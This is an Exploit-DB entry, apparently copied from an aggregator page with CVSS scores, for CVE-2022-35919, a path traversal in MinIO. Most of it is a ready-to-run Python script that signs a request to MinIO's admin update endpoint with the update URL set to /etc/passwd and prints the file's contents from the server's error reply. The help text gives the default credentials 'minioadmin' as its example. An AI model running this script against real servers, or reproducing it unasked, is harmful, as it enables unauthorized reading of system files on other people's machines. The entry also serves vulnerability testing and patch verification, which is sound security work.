Minio 2022-07-29T19-40-48Z - Path traversal

2023-10-0900:00:00

Jenson Zhao

www.exploit-db.com

208

minio

path traversal

exploit

cve-2022-35919

windows 10

security

7.4 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

LOW

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

4.6 Medium

AI Score

Confidence

High

0.003 Low

EPSS

Percentile

67.9%

JSON

# Exploit Title: Minio 2022-07-29T19-40-48Z - Path traversal
# Date: 2023-09-02
# Exploit Author: Jenson Zhao
# Vendor Homepage: https://min.io/
# Software Link: https://github.com/minio/minio/
# Version: Up to (excluding) 2022-07-29T19-40-48Z
# Tested on: Windows 10
# CVE : CVE-2022-35919
# Required before execution: pip install minio,requests
import urllib.parse
import requests, json, re, datetime, argparse
from minio.credentials import Credentials
from minio.signer import sign_v4_s3


class MyMinio():
    secure = False

    def __init__(self, base_url, access_key, secret_key):
        self.credits = Credentials(
            access_key=access_key,
            secret_key=secret_key
        )
        if base_url.startswith('http://') and base_url.endswith('/'):
            self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
        elif base_url.startswith('https://') and base_url.endswith('/'):
            self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
            self.secure = True
        else:
            print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n')

    def poc(self):
        datetimes = datetime.datetime.utcnow()
        datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')
        urls = urllib.parse.urlparse(self.url)
        headers = {
            'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
            'X-Amz-Date': datetime_str,
            'Host': urls.netloc,
        }
        headers = sign_v4_s3(
            method='POST',
            url=urls,
            region='',
            headers=headers,
            credentials=self.credits,
            content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
            date=datetimes,
        )
        if self.secure:
            response = requests.post(url=self.url, headers=headers, verify=False)
        else:
            response = requests.post(url=self.url, headers=headers)
        try:
            message = json.loads(response.text)['Message']
            pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)'
            matches = re.findall(pattern, message)
            if matches:
                print('There is CVE-2022-35919 problem with the url!')
                print('The contents of the /etc/passwd file are as follows:')
                for match in matches:
                    print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5],
                                                        match[6]))
            else:
                print('There is no CVE-2022-35919 problem with the url!')
                print('Here is the response message content:')
                print(message)
        except Exception as e:
            print(
                'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:')
            print(response.text)


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/")
    parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")
    parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")
    args = parser.parse_args()
    minio = MyMinio(args.url, args.accesskey, args.secretkey)
    minio.poc()